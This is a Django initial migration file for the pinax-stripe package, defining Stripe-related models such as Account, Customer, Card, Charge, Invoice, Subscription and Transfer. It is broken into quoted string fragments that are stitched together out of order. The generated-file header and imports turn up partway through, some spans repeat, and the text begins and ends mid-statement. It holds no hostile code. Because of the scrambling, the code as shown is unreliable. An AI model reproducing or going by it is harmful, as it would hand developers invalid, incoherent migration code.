models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id',", "('name', models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None,", "('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True,", "serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True, null=True)),", "models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description',", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "False, }, ), migrations.CreateModel( name='Card', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191,", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)),", "name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name',", "null=True)), ('email', models.TextField(blank=True, null=True)), ('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)),", "), migrations.CreateModel( name='Coupon', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)), ('business_url', models.TextField(blank=True, null=True)), ('charges_enabled', models.BooleanField(default=False)), ('country', models.CharField(max_length=2)), ('debit_negative_balances', models.BooleanField(default=False)),", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('business_name', models.TextField(blank=True, null=True)),", "('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True,", "('currency', models.CharField(blank=True, default='usd', max_length=10)), ('delinquent', models.BooleanField(default=False)), ('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True,", "models.DateTimeField(default=django.utils.timezone.now)), ('kind', models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed',", "related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False,", "('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True,", "('plan', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer',", "('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True,", "models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True, null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False,", "('decline_charge_on_avs_failure', models.BooleanField(default=False)), ('decline_charge_on_cvc_failure', models.BooleanField(default=False)), ('default_currency', models.CharField(max_length=3)), ('details_submitted', models.BooleanField(default=False)), ('display_name', models.TextField(blank=True, null=True)), ('email', models.TextField(blank=True,", "name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'), ), migrations.AddField( model_name='card', name='customer', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer'), ),", "models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)),", "('legal_entity_address_city', models.TextField(blank=True, null=True)), ('legal_entity_address_country', models.TextField(blank=True, null=True)), ('legal_entity_address_line1', models.TextField(blank=True, null=True)), ('legal_entity_address_line2', models.TextField(blank=True, null=True)), ('legal_entity_address_postal_code',", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check',", "models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)),", "max_digits=9)), ('bitcoin_amount', models.PositiveIntegerField()), ('bitcoin_amount_received', models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email',", "primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)),", "models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)), ('transfer_group', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('event', models.ForeignKey(blank=True, null=True,", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_holder_name', models.TextField()), ('account_holder_type', models.TextField()), ('bank_name',", "}, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id',", "null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)), ('trial_end', models.DateTimeField(blank=True, null=True)),", "False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel( name='Transfer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges',", "models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)),", "('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer',", "), migrations.CreateModel( name='Event', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('name', models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)),", "options={ 'abstract': False, }, ), migrations.CreateModel( name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)),", "max_digits=9)), ('amount_reversed', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('application_fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('created', models.DateTimeField(blank=True,", "('subtotal', models.DecimalField(decimal_places=2, max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False, },", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Event')), ], options={ 'abstract': False, }, ),", "jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)),", "primary_key=True, serialize=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(default='usd', max_length=10)), ('application', models.TextField(blank=True, null=True)), ('description', models.TextField(blank=True,", "('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed', models.PositiveIntegerField(blank=True, null=True)), ('valid', models.BooleanField(default=False)), ], options={ 'abstract': False, },", "null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True, null=True)), ('payout_schedule_interval', models.CharField(blank=True, choices=[('Manual', 'manual'), ('Daily', 'daily'),", "import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL),", "null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract':", "migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)),", "settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import", "('address_country', models.TextField(blank=True)), ('address_zip', models.TextField(blank=True)), ('address_zip_check', models.CharField(max_length=15)), ('brand', models.TextField(blank=True)), ('country', models.CharField(blank=True, max_length=2)), ('cvc_check', models.CharField(blank=True,", "null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True,", "name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data', models.TextField()), ('message', models.CharField(max_length=500)), ('traceback', models.TextField()),", "name='Subscription', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent',", "('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)),", "models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('fee_currency', models.CharField(blank=True, max_length=10, null=True)), ('transfer_group', models.TextField(blank=True,", "from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models", "'abstract': False, }, ), migrations.CreateModel( name='EventProcessingException', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('data',", "models.CharField(default='usd', max_length=10)), ('kind', models.CharField(blank=True, max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)),", "null=True)), ('currency', models.CharField(default='usd', max_length=25)), ('date', models.DateTimeField()), ('description', models.TextField(blank=True, null=True)), ('destination', models.TextField(blank=True, null=True)), ('destination_payment',", "models.CharField(max_length=250)), ('livemode', models.BooleanField(default=False)), ('webhook_message', jsonfield.fields.JSONField()), ('validated_message', jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request',", "null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)), ('quantity', models.IntegerField()), ('start', models.DateTimeField()), ('status', models.CharField(max_length=25)),", "1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import Decimal from", "on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='TransferChargeFee', fields=[ ('id', models.CharField(editable=False,", "<reponame>bonidjukic/pinax-stripe # -*- coding: utf-8 -*- # Generated by Django 1.11.8 on 2018-08-06", "related_query_name='user_account', to=settings.AUTH_USER_MODEL)), ], ), migrations.AddField( model_name='invoiceitem', name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField(", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='transfers', to='pinax_stripe.Event')), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ], options={ 'abstract':", "dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ] operations = [ migrations.CreateModel( name='Account', fields=[ ('id', models.CharField(editable=False,", "null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('support_email', models.TextField(blank=True, null=True)), ('support_phone', models.TextField(blank=True, null=True)), ('timezone', models.TextField(blank=True, null=True)),", "('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('percent_off', models.PositiveIntegerField(blank=True, null=True)), ('redeem_by', models.DateTimeField(blank=True, null=True)), ('times_redeemed',", "migrations.CreateModel( name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount',", "null=True)), ('legal_entity_dob', models.DateField(blank=True, null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)),", "models.CharField(max_length=150)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('transfer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='charge_fee_details', to='pinax_stripe.Transfer')), ], options={ 'abstract': False, }, ),", "], options={ 'abstract': False, }, ), migrations.CreateModel( name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True,", "('default_source', models.TextField(blank=True)), ('date_purged', models.DateTimeField(blank=True, editable=False, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user',", "('reversed', models.BooleanField(default=False)), ('source_transaction', models.TextField(blank=True, null=True)), ('source_type', models.TextField(blank=True, null=True)), ('statement_descriptor', models.TextField(blank=True, null=True)), ('status', models.CharField(max_length=25)),", "models.TextField(blank=True, null=True)), ('tos_acceptance_date', models.DateField(blank=True, null=True)), ('tos_acceptance_ip', models.TextField(blank=True, null=True)), ('tos_acceptance_user_agent', models.TextField(blank=True, null=True)), ('payout_schedule_delay_days', models.PositiveSmallIntegerField(blank=True,", "jsonfield.fields.JSONField(blank=True, null=True)), ('routing_number', models.TextField()), ('status', models.TextField()), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='bank_accounts', to='pinax_stripe.Account')), ], options={ 'abstract':", "('cvc_check', models.CharField(blank=True, max_length=15)), ('dynamic_last4', models.CharField(blank=True, max_length=4)), ('tokenization_method', models.CharField(blank=True, max_length=15)), ('exp_month', models.IntegerField()), ('exp_year', models.IntegerField()),", "models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address', models.TextField(blank=True)), ('payment', models.TextField(blank=True)), ('refund_address', models.TextField(blank=True)), ('uncaptured_funds', models.BooleanField(default=False)),", "name='InvoiceItem', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2,", "max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval',", "models.CharField(max_length=150)), ('statement_descriptor', models.TextField(blank=True)), ('trial_period_days', models.IntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_account', models.ForeignKey(blank=True, default=None, null=True,", "name='plan', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Plan'), ), migrations.AddField( model_name='invoiceitem', name='subscription', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'),", "models.DecimalField(decimal_places=2, max_digits=9)), ('date', models.DateTimeField()), ('webhooks_delivered_at', models.DateTimeField(blank=True, null=True)), ('charge', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')),", "('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized',", "models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)), ('current_period_end', models.DateTimeField(blank=True, null=True)), ('current_period_start', models.DateTimeField(blank=True, null=True)), ('ended_at', models.DateTimeField(blank=True, null=True)),", "jsonfield.fields.JSONField(blank=True, null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True,", "('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2,", "('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel(", "null=True)), ('legal_entity_first_name', models.TextField(blank=True, null=True)), ('legal_entity_gender', models.TextField(blank=True, null=True)), ('legal_entity_last_name', models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)),", "max_length=25)), ('period_start', models.DateTimeField()), ('period_end', models.DateTimeField()), ('proration', models.BooleanField(default=False)), ('line_type', models.CharField(max_length=50)), ('description', models.CharField(blank=True, max_length=200)), ('quantity',", "models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)),", "null=True)), ('outcome', jsonfield.fields.JSONField(blank=True, null=True)), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin, models.Model), ), migrations.CreateModel(", "unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('active', models.BooleanField(default=False)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('amount_received', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=9)), ('bitcoin_amount',", "null=True)), ('failure_message', models.TextField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('method', models.TextField(blank=True, null=True)), ('reversed',", "fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=255)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)),", "('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True,", "null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ), migrations.AddField( model_name='charge', name='invoice', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Invoice'),", "null=True)), ('valid', models.NullBooleanField()), ('processed', models.BooleanField(default=False)), ('request', models.CharField(blank=True, max_length=100)), ('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)),", "('charge_created', models.DateTimeField(blank=True, null=True)), ('available', models.BooleanField(default=False)), ('available_on', models.DateTimeField(blank=True, null=True)), ('fee', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)),", "('stripe_account', models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={", "max_digits=9)), ('tax', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('tax_percent', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('total', models.DecimalField(decimal_places=2,", "on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Charge')), ('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='invoices', to='pinax_stripe.Customer')), ], options={ 'abstract': False, }, bases=(pinax.stripe.models.StripeAccountFromCustomerMixin,", "models.BooleanField(default=False)), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32,", "related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='charges', to='pinax_stripe.Customer'), ),", "}, ), migrations.CreateModel( name='BankAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)),", "models.TextField(blank=True, null=True)), ('legal_entity_verification_status', models.TextField(blank=True, null=True)), ('type', models.TextField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True, null=True)), ('stripe_publishable_key', models.CharField(blank=True,", "models.TextField(blank=True, null=True)), ('legal_entity_maiden_name', models.TextField(blank=True, null=True)), ('legal_entity_personal_id_number_provided', models.BooleanField(default=False)), ('legal_entity_phone_number', models.TextField(blank=True, null=True)), ('legal_entity_ssn_last_4_provided', models.BooleanField(default=False)), ('legal_entity_type',", "), migrations.CreateModel( name='Customer', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at',", "models.PositiveIntegerField(default=0)), ('bitcoin_uri', models.TextField(blank=True)), ('currency', models.CharField(default='usd', max_length=10)), ('description', models.TextField(blank=True)), ('email', models.TextField(blank=True)), ('filled', models.BooleanField(default=False)), ('inbound_address',", "models.CharField(blank=True, max_length=100)), ('currency', models.CharField(default='usd', max_length=10)), ('amount', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('amount_refunded', models.DecimalField(blank=True, decimal_places=2,", "by Django 1.11.8 on 2018-08-06 19:00 from __future__ import unicode_literals from decimal import", "to='pinax_stripe.Invoice')), ], options={ 'abstract': False, }, ), migrations.CreateModel( name='Plan', fields=[ ('id', models.CharField(editable=False, max_length=32,", "('pending_webhooks', models.PositiveIntegerField(default=0)), ('api_version', models.CharField(blank=True, max_length=100)), ('customer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Customer')), ('stripe_account', models.ForeignKey(blank=True, default=None,", "max_digits=9, null=True)), ('description', models.TextField(blank=True)), ('paid', models.NullBooleanField()), ('disputed', models.NullBooleanField()), ('refunded', models.NullBooleanField()), ('captured', models.NullBooleanField()), ('receipt_sent',", "models.DateTimeField(default=django.utils.timezone.now)), ('amount', models.DecimalField(decimal_places=2, max_digits=9)), ('currency', models.CharField(max_length=15)), ('interval', models.CharField(max_length=15)), ('interval_count', models.IntegerField()), ('name', models.CharField(max_length=150)), ('statement_descriptor',", "default=None, null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Account')), ('user', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], options={ 'abstract': False,", "migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields import pinax.stripe.models class Migration(migrations.Migration): initial", "('duration', models.CharField(default='once', max_length=10)), ('duration_in_months', models.PositiveIntegerField(blank=True, null=True)), ('livemode', models.BooleanField(default=False)), ('max_redemptions', models.PositiveIntegerField(blank=True, null=True)), ('metadata', jsonfield.fields.JSONField(blank=True,", "migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField( model_name='charge', name='customer', field=models.ForeignKey(blank=True, null=True,", "models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)),", "models.TextField(blank=True)), ('address_line_1', models.TextField(blank=True)), ('address_line_1_check', models.CharField(max_length=15)), ('address_line_2', models.TextField(blank=True)), ('address_city', models.TextField(blank=True)), ('address_state', models.TextField(blank=True)), ('address_country', models.TextField(blank=True)),", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('amount_off', models.DecimalField(blank=True, decimal_places=2, max_digits=9, null=True)), ('currency', models.CharField(default='usd', max_length=10)), ('duration', models.CharField(default='once', max_length=10)),", "models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('stripe_id', models.CharField(max_length=191, unique=True)), ('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('account_balance', models.DecimalField(blank=True, decimal_places=2, max_digits=9,", "('payouts_enabled', models.BooleanField(default=False)), ('verification_disabled_reason', models.TextField(blank=True, null=True)), ('verification_due_by', models.DateTimeField(blank=True, null=True)), ('verification_timestamp', models.DateTimeField(blank=True, null=True)), ('verification_fields_needed', jsonfield.fields.JSONField(blank=True,", "import settings from django.db import migrations, models import django.db.models.deletion import django.utils.timezone import jsonfield.fields", "('created_at', models.DateTimeField(default=django.utils.timezone.now)), ('application_fee_percent', models.DecimalField(blank=True, decimal_places=2, default=None, max_digits=3, null=True)), ('cancel_at_period_end', models.BooleanField(default=False)), ('canceled_at', models.DateTimeField(blank=True, null=True)),", "('verification_fields_needed', jsonfield.fields.JSONField(blank=True, null=True)), ('authorized', models.BooleanField(default=True)), ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stripe_accounts', to=settings.AUTH_USER_MODEL)), ], options={", "name='UserAccount', fields=[ ('id', models.CharField(editable=False, max_length=32, primary_key=True, serialize=False)), ('account', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='user_accounts', related_query_name='user_account', to='pinax_stripe.Account')), ('customer',", "null=True, on_delete=django.db.models.deletion.CASCADE, to='pinax_stripe.Subscription'), ), migrations.AddField( model_name='customer', name='users', field=models.ManyToManyField(related_name='customers', related_query_name='customers', through='pinax_stripe.UserAccount', to=settings.AUTH_USER_MODEL), ), migrations.AddField(", "('currency', 